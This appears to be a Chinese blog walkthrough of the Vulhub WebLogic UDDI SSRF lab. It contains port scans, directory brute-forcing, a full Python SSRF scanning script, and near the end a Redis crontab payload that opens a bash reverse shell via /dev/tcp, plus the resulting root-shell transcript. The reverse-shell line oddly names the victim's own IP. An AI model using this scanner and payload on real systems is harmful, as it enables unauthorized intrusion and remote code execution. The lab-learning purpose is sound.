vulhub Weblogic SSRF漏洞 复现

环境和介绍请到Vulhub查看

假装自己在闲逛,发现了一个网址http://10.20.7.7
好的先来一个全端口扫描，用我最近学会的新玩具netcat

root@Sanqiushu:~# nc -z -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
----------
获取一下banner信息
root@Sanqiushu:~# echo "" | nc -n -v 10.20.7.7 1-65535
(UNKNOWN) [10.20.7.7] 7001 (afs3-callback) open
(UNKNOWN) [10.20.7.7] 4444 (?) : Connection timed out
(UNKNOWN) [10.20.7.7] 22 (ssh) open
SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
Protocol mismatch.
------------
对比一下nmap
root@Sanqiushu:~# nmap  10.20.7.7 -p 1-65535
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-15 15:09 CST
Nmap scan report for 10.20.7.7
Host is up (0.000077s latency).
Not shown: 65532 closed ports
PORT     STATE    SERVICE
22/tcp   open     ssh
4444/tcp filtered krb524
7001/tcp open     afs3-callback
MAC Address: 08:00:27:F1:8C:A9 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 18.55 seconds

发现一个7001端口，浏览器访问一下

image.png

没啥发现，那就扫一下路径

PS F:\SecTools\apps\dirsearch-master\dirsearch-master> ./dirsearch.py -u http://10.20.7.7:7001/ -e jsp

 _|. _ _  _  _  _ _|_    v0.3.8
(_||| _) (/_(_|| (_| )

Extensions: jsp | HTTP method: get | Threads: 10 | Wordlist size: 6074

Error Log: F:\SecTools\apps\dirsearch-master\dirsearch-master\logs\errors-19-08-15_15-00-35.log

Target: http://10.20.7.7:7001/

[15:00:35] Starting:
[15:00:41] 302 -  273B  - /bea_wls_internal  ->  http://10.20.7.7:7001/bea_wls_internal/
[15:00:41] 200 -    0B  - /bea_wls_internal/HTTPClntRecv
[15:00:41] 500 -    2KB - /beanManaged
[15:00:41] 500 -    2KB - /bea_wls_internal/HTTPClntSend
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientClose
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientLogin
[15:00:41] 200 -    0B  - /bea_wls_internal/iiop/ClientRecv
[15:00:41] 500 -    2KB - /Bigdump.jsp
[15:00:41] 500 -    2KB - /bea_wls_internal/iiop/ClientSend
[15:00:42] 200 -  416B  - /console
[15:00:42] 200 -  418B  - /console/
[15:00:42] 200 -  435B  - /console/base/config.json
[15:00:42] 200 -  440B  - /console/payments/config.json
[15:00:42] 200 -  437B  - /console/j_security_check
[15:00:54] 302 -  265B  - /uddiexplorer  ->  http://10.20.7.7:7001/uddiexplorer/
[15:00:54] 302 -  249B  - /uddi  ->  http://10.20.7.7:7001/uddi/
[15:00:55] 200 -  855B  - /uddi/uddilistener

Task Completed
PS F:\SecTools\apps\dirsearch-master\dirsearch-master>

发现不少路径访问一下看看

image.png
发现一个UDDI Explorer
这个漏洞影响的版本是weblogic 10.0.2 -- 10.3.6
这里看不到版本很难受
直接测试吧
image.png
随便搜索点啥
image.png
burp拦截请求，右键发送到Repeater
image.png
这里改成测试地址
image.png
服务器返回404，很好
然后探测内网服务
脚本见https://www.jianshu.com/p/97b157a20108（我没试过）
复制过来一下

import re

import sys

import Queue

import requests

import threading

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

queue = Queue.Queue()

mutex = threading.Lock()

class Test(threading.Thread):
    def __init__(self, queue):

        threading.Thread.__init__(self)

        self.queue = queue

    def check(self,domain,ip):

        payload = "uddiexplorer/SearchPublicRegistries.jsp?operator={ip}&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search".format(ip=ip)

        url = domain + payload

        try:

            html = requests.get(url=url, timeout=15, verify=False).content

            m = re.search('weblogic.uddi.client.structures.exception.XML_SoapException',html)

            if m:

                mutex.acquire()

                with open('ssrf1.txt','a+') as f:

                    print "%s has weblogic ssrf." % domain

                    f.write("%s has weblogic ssrf." % domain)

                mutex.release()

        except Exception,e:

            print e

    def get_registry(self,domain):

        payload = 'uddiexplorer/SetupUDDIExplorer.jsp'

        url = domain + payload

        try:

            html = requests.get(url=url, timeout=15, verify=False).content

            m = re.search('<i>For example: (.*?)/uddi/uddilistener.*?</i>',html)

            if m:

                return m.group(1)

        except Exception,e:

            print e

    def run(self):

        while not self.queue.empty():

            domain = self.queue.get()

            mutex.acquire()

            print domain

            mutex.release()

            ip = self.get_registry(domain)

            self.check(domain,ip)

            self.queue.task_done()

if __name__ == '__main__':

    with open('domain.txt','r') as f:

        lines = f.readlines()

    for line in lines:

        queue.put(line.strip())

    for x in xrange(1,50):

        t = Test(queue)

        t.setDaemon(True)

        t.start()

    queue.join()

这里发现一个6379的服务（咋知道这是啥服务呢？）

image.png

直接redis的payload打过去就好了

监听的机器等好一会就收到连接了

root@Sanqiushu:~# nc -lvp 4444
listening on [any] 4444 ...
10.20.7.7: inverse host lookup failed: Unknown host
connect to [10.20.2.185] from (UNKNOWN) [10.20.7.7] 45976
bash: no job control in this shell
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]# ls
ls
anaconda-ks.cfg
install.log
install.log.syslog
[root@31607ec8723e ~]# 

payload 原本长这样

test

set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/10.20.7.7/4444 0>&1\n\n\n\n"
config set dir /etc/
config set dbfilename crontab
save

aaa

发送的时候进行url编码了，post的话好像没啥必要